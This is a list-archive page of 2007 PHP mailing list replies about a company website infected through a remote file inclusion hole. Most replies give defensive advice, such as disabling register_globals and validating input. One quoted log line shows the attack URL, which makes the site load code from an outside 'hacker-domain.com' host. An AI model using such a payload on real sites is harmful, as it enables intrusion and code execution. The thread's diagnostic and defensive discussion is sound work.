[PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Seak, Teng-Fong
Stut wrote: Seak, Teng-Fong wrote: But after I've spent some time reading the log files, I've finally found out how the hackers managed to achieve worm infiltration. Actually, they're using an URL like this:

Re: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Dave Goodchild
Turn off register_globals - if you pollute your scripts with global variables like that you are asking for trouble. If you can't, make sure you clean the variable. Using include($page.php) is asking for trouble. If you can get register_globals switched off (it's off by default in PHP5 for this

[PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Seak, Teng-Fong
Seak, Teng-Fong wrote: No, I don't deserve anything because, as I've written in the original post (but I suppose you didn't notice), the website is outsourced and made by a 3rd company. Well, I've just realised (and checked) that I forgot to mention that my company's website was outsourced.

RE: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Jim Moseby
Seak, Teng-Fong wrote: No, I don't deserve anything because, as I've written in the original post (but I suppose you didn't notice), the website is outsourced and made by a 3rd company. Then you should be having this conversation with the 3rd party. They need to validate *EVERY* bit of

Re: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Richard Lynch
On Thu, March 15, 2007 9:15 am, Seak, Teng-Fong wrote: Stut wrote: Seak, Teng-Fong wrote: But after I've spent some time reading the log files, I've finally found out how the hackers managed to achieve worm infiltration. Actually, they're using an URL like this:

RE: [PHP] Re: Question on virus/worms

2007-03-03 Thread Tim
-Original Message- From: Stut [mailto:[EMAIL PROTECTED] Sent: Friday, 2 March 2007 20:23 To: Seak, Teng-Fong Cc: php-windows@lists.php.net; php-general@lists.php.net Subject: Re: [PHP] Re: Question on virus/worms Seak, Teng-Fong wrote: But after I've spent some time

RE: [PHP] Re: Question on virus/worms

2007-03-03 Thread Robert Cummings
On Sat, 2007-03-03 at 14:02 +0100, Tim wrote: Once you are comfortable with this, before you use a script downloaded from the inet in a production environment, go through the code and make sure you don't see any backdoor code (unnecessary fsockopen(), exec() etc.. That isn't related to the

Re: [PHP] Re: Question on virus/worms

2007-03-02 Thread Stut
Seak, Teng-Fong wrote: But after I've spent some time reading the log files, I've finally found out how the hackers managed to achieve worm infiltration. Actually, they're using an URL like this: http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt? And